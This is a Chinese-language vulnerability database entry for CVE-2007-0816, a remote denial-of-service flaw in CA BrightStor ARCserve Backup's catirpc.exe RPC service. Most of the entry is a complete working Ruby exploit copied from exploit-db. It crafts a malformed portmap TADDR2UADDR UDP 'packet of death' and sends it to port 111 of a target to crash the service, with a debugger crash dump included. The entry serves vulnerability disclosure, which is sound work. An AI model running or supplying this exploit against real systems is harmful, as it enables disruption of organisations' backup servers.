CA BrightStor ARCserve Backup catirpc.exe远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112146 漏洞类型 其他
发布时间 2007-02-01 更新时间 2007-07-05
CVE编号 CVE-2007-0816 CNNVD-ID CNNVD-200702-107
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3248
https://www.securityfocus.com/bid/22365
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-107
|漏洞详情
BrightStorARCserveBackup可为各种平台的服务器提供备份和恢复保护功能。BrightStorARCserveBackup的CATIRPC.EXE进程在处理畸形用户请求时存在漏洞,远程攻击者可能利用此漏洞导致进程崩溃。BrightStorARCserveBackup在处理CA远程过程调用服务器(CATIRPC.EXE)服务的TADDR2UADDR(0x08)请求字节时存在空指针引用。如果攻击者向111/UDP端口发送了特制报文的话,就可以触发这个漏洞,导致服务崩溃。
|漏洞EXP
#!/usr/bin/ruby
#  
# Computer Associates (CA) Brightstor Backup Remote Procedure Call Server DoS (catirpc.dll)
#
# Catirpc.exe - Provides the endpoint mapper and enables RPC services for BrightStor Backup products.
# 
# (7c.350): Access violation - code c0000005 (!!! second chance !!!)
# eax=007ef924 ebx=2e009560 ecx=00325ad8 edx=007ef900 esi=00000000 edi=00324308
# eip=2e00eda8 esp=007ef8b8 ebp=2e00be00 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206
# *** WARNING: Unable to verify checksum for C:\Program Files\CA\BrightStor ARCserve 
# Backup\CATIRPC.dll
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program 
# Files\CA\BrightStor ARCserve Backup\CATIRPC.dll - 
# CATIRPC_2e000000!get_hostbyname+478:
# 2e00eda8 668b4602         mov     ax,[esi+0x2]          ds:0023:00000002=???? 
#
# CATIRPC.dll does not properly handle TADDR2UADDR procedures used in RPC communications with
# the CA RPC Server (Catirpc.exe). This leads to a condition where a null memory pointer
# is dereferenced. This appears to be only a DoS, but please prove me otherwise. This was tested on
# BrightStor ARCserve Backup 11.5.2.0 (SP2)
#
# (c) Copyright 2007 Shirkdog i 
#
# Author: M. Shirk (Shirkdog) shirkdog_list ^ at % hotmail.com
# Thanks to Tebodell for testing
#
# Greetz to str0ke, Galileo. Metasploit module to follow

require 'socket'

backup_server = (ARGV[0])
target_port = (ARGV[1] || 111) 

#RPC/Portmap packet
packet_of_death= 
"\xde\xad\xbe\xef"  + # XID
"\x00\x00\x00\x00" + # Message Type: Call (0)
"\x00\x00\x00\x02" + # RPC Version: 2
"\x00\x01\x86\xa0" + # Program: Portmap
"\x00\x00\x00\x03" + # Program Version: 3
"\x00\x00\x00\x08" + # Procedure: TADDR2UADDR (8)
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" + #Credentials and Verifier all NULL
"\x46\x9b\x22\xe2" + # Portmap data
"\x00\x00\x00\x00" + # Nulls that get processed during address shifting
"\x00\x00\x00\x00" +
"\x00\x00\x00\x00" 

puts "[+]Computer Associates (CA) Brightstor ARCServe Backup Remote Procedure Call Server DoS (catirpc.dll)\n"
puts "[+]Author: Shirkdog\n\n"

if (!(backup_server && target_port))
	puts "Usage: catirpcdos.rb host port (default port: 111)\n"
	exit
else
	puts "[+]Sending UDP Packet of Death...\n"	
	sock = UDPSocket.open
	sock.connect(backup_server, target_port.to_i)
	sock.send(packet_of_death, 0)
	puts "[+]Done...\n[+]Catirpc.exe is dead\n[+]... or it will die in a few seconds for you inpatient bastards\n"
end

# milw0rm.com [2007-02-01]
|受影响的产品
Computer Associates Server Protection Suite r2 Computer Associates Protection Suites r2 0 Computer Associates Business Protection Suite for Microsoft SBS Std Ed r2 Computer Associates Business Protection
|参考资料

来源:XF
名称:ca-brightstor-catirpc-dos(32137)
链接:http://xforce.iss.net/xforce/xfdb/32137
来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=35058
来源:www3.ca.com
链接:http://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=101317
来源:BID
名称:22365
链接:http://www.securityfocus.com/bid/22365
来源:VUPEN
名称:ADV-2007-0461
链接:http://www.frsirt.com/english/advisories/2007/0461
来源:supportconnectw.ca.com
链接:http://supportconnectw.ca.com/public/storage/infodocs/babtapeng-securitynotice.asp
来源:SECUNIA
名称:24512
链接:http://secunia.com/advisories/24512
来源:SECUNIA
名称:24009
链接:http://secunia.com/advisories/24009
来源:OSVDB
名称:32989
链接:http://osvdb.org/32989
来源:MILW0RM
名称:3248
链接:http://milw0rm.com/exploits/3248